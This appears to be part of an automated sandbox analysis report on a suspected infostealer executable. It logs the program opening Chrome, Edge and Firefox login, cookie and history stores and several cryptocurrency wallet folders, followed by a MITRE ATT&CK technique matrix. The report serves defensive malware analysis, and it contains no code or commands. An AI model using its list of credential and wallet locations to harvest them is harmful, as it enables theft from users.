                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-shm
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\default
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\minidumps
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\security_state
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-wal
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\saved-telemetry-pings
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\025af778-db9d-49f0-b172-4eb563717cb5
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-wal
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionstore-backups
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\bookmarkbackupsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-releaseJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\IconsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\temporaryJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\dbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\IconsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanentJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\to-be-removedJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\eventsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chromeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\crashesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\IconsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior

                      Remote Access Functionality

                      | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                      |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                      | Gather Victim Identity Information | Acquire Infrastructure | 1 Valid Accounts | 331 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Disable or Modify Tools | 1 OS Credential Dumping | 11 System Time Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact |
                      | Credentials | Domains | Default Accounts | 22 Command and Scripting Interpreter | 1 Valid Accounts | 1 Valid Accounts | 11 Deobfuscate/Decode Files or Information | 1 GUI Input Capture | 2 System Network Connections Discovery | Remote Desktop Protocol | 4 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                      | Email Addresses | DNS Server | Domain Accounts | 1 Service Execution | 1 Windows Service | 1 Windows Service | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 GUI Input Capture | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                      | Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 1 DLL Side-Loading | NTDS | 38 System Information Discovery | Distributed Component Object Model | 1 Clipboard Data | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
                      | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | LSA Secrets | 431 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                      | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 141 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                      | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Process Injection | DCSync | 141 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
